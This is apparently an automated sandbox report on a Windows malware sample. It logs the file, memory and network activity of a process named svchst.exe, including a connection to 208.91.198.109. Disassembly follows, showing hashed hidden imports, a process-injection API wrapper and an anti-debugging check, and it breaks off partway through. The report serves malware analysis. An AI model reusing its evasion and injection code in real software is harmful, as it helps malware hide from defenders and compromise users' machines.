File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977030781
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977031477
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977032451
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977033039
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977033980
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977034568
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977035510
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977036099
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977037101
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977037689
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977038629
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977039213
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977040152
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977040739
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977041680
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977042266
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977043208
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977043793
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977044734
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977045322
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977046384
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977046977
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977047922
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977048562
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977049520
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977050112
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977051055
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977051644
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977052589
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977053178
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977054123
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977054708
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977055652
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977056237
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977057177
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977057761
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977058702
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977059295
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977060822
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977061417
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977062365
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977062954
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977063899
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977064490
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977065560
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977066162
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977067112
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977067703
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977068651
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977069249
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977070194
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977070784
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977071730
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977072319
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977073264
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977073850
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977074836
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977075426
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977076371
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977076615
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977077987
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977078586
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977079533
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977080124
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977081138
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977081730
Thread delayed Time: -120 TID: 1152 unknown 977082175

Analysis Process: svchst.exe PID: 1616 Parent PID: 1508

General
Start time: 09:39:52
Start date: 24/01/2012
Path: C:\WINDOWS\svchst.exe
Wow64 process (32bit): false
Commandline: C:\WINDOWS\svchst.exe
Imagebase: 0x400000
File size: 196608 bytes
MD5 hash: 6B16C4526A013E744B3D91CD7A091C36

File Activites
File Path Access Options Content overwritten Completion Count Source Address Symbol
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 403134 CreateFileA
File Written
File Path Offset Length Value Completion Count Source Address Symbol
C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf unknown 1 34 success or wait 32 402DD5 WriteFile
File Path Offset Length Completion Count Source Address Symbol
Directory Information Queried
File Path Disposition File Mask Completion Count Source Address Symbol
C:\WINDOWS BothDirectoryInformation svchst.exe success or wait 1 407930 FindFirstFileA
C:\Documents and Settings\NetworkService\Local Settings\Application Data BothDirectoryInformation sLT.exf no such file 1 407930 FindFirstFileA
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\oleaut32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\shell32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 880000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 890000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 890000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 890000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 890000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 890000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit C60000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 930000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
Section loaded by Program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\ws2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 4146F4
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 4146F4
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 4146F4
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 4146F4
\KnownDlls\ssleay32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420
\KnownDlls\libeay32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420
\KnownDlls\libssl32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420

Registry Activites
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Key Path Name Completion Count Source Address Symbol

Process Activites
PID Path Process info class Completion Count Source Address Symbol

Thread Activites
Thread Created
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
784 1616 7C8106F9 404358 C:\WINDOWS\svchst.exe success or wait 1 4043CB CreateThread
Thread Execution Resumed
TID PID Path Completion Count Source Address Symbol
784 1616 C:\WINDOWS\svchst.exe success or wait 2 4134F9 ResumeThread
Thread Delayed
TID Delay Completion Count Source Address Symbol
784 0s success or wait 1 41377E Sleep
784 0s success or wait 1 41377E Sleep
784 -179s success or wait 1 42975F Sleep

Memory Activites
Memory Allocated
PID Filepath Base Length Protection Completion Count Source Address Symbol
1616 C:\WINDOWS\svchst.exe 960000 12FA74 page no access success or wait 1 401554 VirtualAlloc
1616 C:\WINDOWS\svchst.exe 149000 12F7E8 page read and write success or wait 1 401394 LocalAlloc
1616 C:\WINDOWS\svchst.exe 960000 12FA64 page read and write success or wait 1 401726 VirtualAlloc
1616 C:\WINDOWS\svchst.exe 8B0000 C5FDE0 page read and write success or wait 1 4062EB GlobalAlloc
1616 C:\WINDOWS\svchst.exe 8B0000 C5FDDC page read and write success or wait 1 4062EB GlobalAlloc
1616 C:\WINDOWS\svchst.exe 14F000 C5F998 page read and write success or wait 1 4062EB GlobalAlloc
Memory Protection Changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
1616 C:\WINDOWS\svchst.exe 400000 1000 page read and write page read and write success or wait 2 437D1F VirtualProtect
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:39:53 0 2 0
09:39:54 0 2 0
09:39:55 0 2 0

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol

Network Activites
Socket Bound
IP Port Completion Count Source Address Symbol
0.0.0.0 0 success or wait 1 413A0A connect
Socket connected
IP Port Completion Count Source Address Symbol
208.91.198.109 80 pending 1 413A0A connect
Chronological Activities
Operation Data Completion Time
Memory attributes changed PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page read and write success or wait 549580625
Memory attributes changed PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page read and write success or wait 549581443
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 960000 Length: 12FA74 Allocation Type: unknown Protection: page no access success or wait 549612937
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 149000 Length: 12F7E8 Allocation Type: unknown Protection: page read and write success or wait 549615473
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 960000 Length: 12FA64 Allocation Type: unknown Protection: page read and write success or wait 549617114
Section loaded Path: \KnownDlls\ws2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 549799950
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 549802672
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 549823168
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 549825739
Section loaded Path: \KnownDlls\ssleay32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 550089619
Section loaded Path: \KnownDlls\libeay32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 550091342
Section loaded Path: \KnownDlls\libssl32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 550092072
Directory Information Queried Path: C:\WINDOWSDisposition: BothDirectoryInformation Filemask: svchst.exe success or wait 550095247
Directory Information Queried Path: C:\Documents and Settings\NetworkService\Local Settings\Application DataDisposition: BothDirectoryInformation Filemask: sLT.exf no such file 550184255
File created Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 550189199
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550201901
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550214108
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550222879
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550241185
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550253173
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550263758
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550283461
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550303243
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550325004
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550358854
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550380612
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550397529
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550438346
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550487300
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550552399
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550592062
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550648493
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550684034
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550708544
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550730821
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550826612
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550905153
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550990629
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551050666
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551124472
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551196515
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551231268
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551253361
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551268681
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551280843
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551339811
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551365859
Thread created PID: 1616 TID: 784 EIP: 7C8106F9 EAX: 404358 Imagepath: C:\WINDOWS\svchst.exe success or wait 551411403
Thread resumed TID: 784 PID: 1616 Path: C:\WINDOWS\svchst.exe success or wait 551412370
Thread resumed TID: 784 PID: 1616 Path: C:\WINDOWS\svchst.exe success or wait 551413856
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 8B0000 Length: C5FDE0 Allocation Type: unknown Protection: page read and write success or wait 551418450
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 8B0000 Length: C5FDDC Allocation Type: unknown Protection: page read and write success or wait 551419652
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 14F000 Length: C5F998 Allocation Type: unknown Protection: page read and write success or wait 551420983
Listening socket Port: 0 IP: 0.0.0.0 success or wait 554619165
Connected socket Port: 80 IP: 208.91.198.109 pending 554629821
Thread delayed Time: 0 TID: 784 success or wait 554650050
Thread delayed Time: 0 TID: 784 success or wait 556309813
Thread delayed Time: -179 TID: 784 success or wait 556314256

Disassembly

Code Analysis

Analysis Process: vm_tricks_sample.exe PID: 484 Parent PID: 504

Executed Functions
Function 00414270, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • GetDriveTypeA.KERNEL32, ref: 00414286
Address Instruction Meta Information
00414270 push ebp xrefs 00415409, 00415500, 00415646, 00413EFE
00414271 mov ebp, esp
00414273 mov eax, dword ptr [ebp+08h]
00414276 push eax
00414277 push 6B5366BEh
0041427C push 399354CEh
00414281 call 00415E40h
00414286 call eax GetDriveTypeA@KERNEL32.DLL (Hidden Import)
00414288 pop ebp
00414289 retn 0004h function end
Function 00412190, API count: 0, instr count: 70
Strings
  • ntdll.dll, va: 0041215C
  • ZwQueryInformationProcess, va: 00412168
Address Instruction Meta Information
00412190 push ebp xrefs 00414897
00412191 mov ebp, esp
00412193 sub esp, 14h
00412196 mov dword ptr [ebp-08h], 00000000h
0041219D lea eax, dword ptr [ebp-08h]
004121A0 push eax
004121A1 push FFFFFFFFh
004121A3 call 00412250h
004121A8 cmp dword ptr [ebp-08h], 00000000h
004121AC je 004121B5h
004121AE mov al, 01h
004121B0 jmp 00412246h
004121B5 push 0041215Ch ASCII "ntdll.dll" xrefs 004121AC
004121BA call 00412270h
004121BF mov dword ptr [ebp-10h], eax
004121C2 cmp dword ptr [ebp-10h], 00000000h
004121C6 jne 004121CCh
004121C8 mov al, 01h
004121CA jmp 00412246h
004121CC push 00412168h ASCII "ZwQueryInformationProcess" xrefs 004121C6
004121D1 mov ecx, dword ptr [ebp-10h]
004121D4 push ecx
004121D5 call 00412290h
004121DA mov dword ptr [ebp-04h], eax
004121DD cmp dword ptr [ebp-04h], 00000000h
004121E1 jne 004121E7h
004121E3 mov al, 01h
004121E5 jmp 00412246h
004121E7 mov dword ptr [ebp-0Ch], 00000000h xrefs 004121E1
004121EE mov dword ptr [ebp-14h], 00000001h
004121F5 push 00000000h
004121F7 push 00000004h
004121F9 lea edx, dword ptr [ebp-0Ch]
004121FC push edx
004121FD push 00000007h
004121FF push FFFFFFFFh
00412201 call dword ptr [ebp-04h]
00412204 test eax, eax
00412206 jl 00412212h
00412208 cmp dword ptr [ebp-0Ch], 00000000h
0041220C je 00412212h
0041220E mov al, 01h
00412210 jmp 00412246h
00412212 push 00000000h xrefs 00412206, 0041220C
00412214 push 00000004h
00412216 lea eax, dword ptr [ebp-0Ch]
00412219 push eax
0041221A push 0000001Eh
0041221C push FFFFFFFFh
0041221E call dword ptr [ebp-04h]
00412221 test eax, eax
00412223 jne 00412229h
00412225 mov al, 01h
00412227 jmp 00412246h
00412229 push 00000000h xrefs 00412223
0041222B push 00000004h
0041222D lea ecx, dword ptr [ebp-14h]
00412230 push ecx
00412231 push 0000001Fh
00412233 push FFFFFFFFh
00412235 call dword ptr [ebp-04h]
00412238 test eax, eax
0041223A jl 00412246h
0041223C mov edx, dword ptr [ebp-14h]
0041223F and edx, 01h
00412242 jne 00412246h
00412244 mov al, 01h
00412246 mov esp, ebp xrefs 0041223A, 00412242, 00412227, 00412210, 004121E5, 004121CA, 004121B0
00412248 pop ebp
00412249 ret function end
Function 00414A70, API count: 1, instr count: 20
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegSetValueExA.ADVAPI32, ref: 00414A9A
Address Instruction Meta Information
00414A70 push ebp xrefs 004147BE
00414A71 mov ebp, esp
00414A73 mov eax, dword ptr [ebp+1Ch]
00414A76 push eax
00414A77 mov ecx, dword ptr [ebp+18h]
00414A7A push ecx
00414A7B mov edx, dword ptr [ebp+14h]
00414A7E push edx
00414A7F mov eax, dword ptr [ebp+10h]
00414A82 push eax
00414A83 mov ecx, dword ptr [ebp+0Ch]
00414A86 push ecx
00414A87 mov edx, dword ptr [ebp+08h]
00414A8A push edx
00414A8B push 647832FCh
00414A90 push 3E400FD6h
00414A95 call 00415E40h
00414A9A call eax RegSetValueExA@ADVAPI32.DLL (Hidden Import)
00414A9C pop ebp
00414A9D retn 0018h function end
Function 00414520, API count: 1, instr count: 18
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • WriteProcessMemory.KERNEL32, ref: 00414546
Address Instruction Meta Information
00414520 push ebp xrefs 00414343, 004143EB, 004143B4, 004152C8, 004152E6
00414521 mov ebp, esp
00414523 mov eax, dword ptr [ebp+18h]
00414526 push eax
00414527 mov ecx, dword ptr [ebp+14h]
0041452A push ecx
0041452B mov edx, dword ptr [ebp+10h]
0041452E push edx
0041452F mov eax, dword ptr [ebp+0Ch]
00414532 push eax
00414533 mov ecx, dword ptr [ebp+08h]
00414536 push ecx
00414537 push 6B5366BEh
0041453C push BEA0BF35h
00414541 call 00415E40h
00414546 call eax WriteProcessMemory@KERNEL32.DLL (Hidden Import)
00414548 pop ebp
00414549 retn 0014h function end
Function 004141E0, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • FindNextFileA.KERNEL32, ref: 004141FA
Address Instruction Meta Information
004141E0 push ebp xrefs 0041468B, 00413EB4
004141E1 mov ebp, esp
004141E3 mov eax, dword ptr [ebp+0Ch]
004141E6 push eax
004141E7 mov ecx, dword ptr [ebp+08h]
004141EA push ecx
004141EB push 6B5366BEh
004141F0 push 279DEAD7h
004141F5 call 00415E40h
004141FA call eax FindNextFileA@KERNEL32.DLL (Hidden Import)
004141FC pop ebp
004141FD retn 0008h function end
Function 004140F0, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • FindFirstFileA.KERNEL32, ref: 0041410A
Address Instruction Meta Information
004140F0 push ebp xrefs 0041465F, 00413D6C
004140F1 mov ebp, esp
004140F3 mov eax, dword ptr [ebp+0Ch]
004140F6 push eax
004140F7 mov ecx, dword ptr [ebp+08h]
004140FA push ecx
004140FB push 6B5366BEh
00414100 push 32432444h
00414105 call 00415E40h
0041410A call eax FindFirstFileA@KERNEL32.DLL (Hidden Import)
0041410C pop ebp
0041410D retn 0008h function end
Function 00414B50, API count: 1, instr count: 20
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateThread.KERNEL32, ref: 00414B7A
Address Instruction Meta Information
00414B50 push ebp xrefs 00414982, 00414996, 0041495A
00414B51 mov ebp, esp
00414B53 mov eax, dword ptr [ebp+1Ch]
00414B56 push eax
00414B57 mov ecx, dword ptr [ebp+18h]
00414B5A push ecx
00414B5B mov edx, dword ptr [ebp+14h]
00414B5E push edx
00414B5F mov eax, dword ptr [ebp+10h]
00414B62 push eax
00414B63 mov ecx, dword ptr [ebp+0Ch]
00414B66 push ecx
00414B67 mov edx, dword ptr [ebp+08h]
00414B6A push edx
00414B6B push 6B5366BEh
00414B70 push 6FB89AF0h
00414B75 call 00415E40h
00414B7A call eax CreateThread@KERNEL32.DLL (Hidden Import)
00414B7C pop ebp
00414B7D retn 0018h function end
Function 004144B0, API count: 1, instr count: 28
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateProcessA.KERNEL32, ref: 004144EA
Address Instruction Meta Information
004144B0 push ebp xrefs 00414300, 0041516E
004144B1 mov ebp, esp
004144B3 mov eax, dword ptr [ebp+2Ch]
004144B6 push eax
004144B7 mov ecx, dword ptr [ebp+28h]
004144BA push ecx
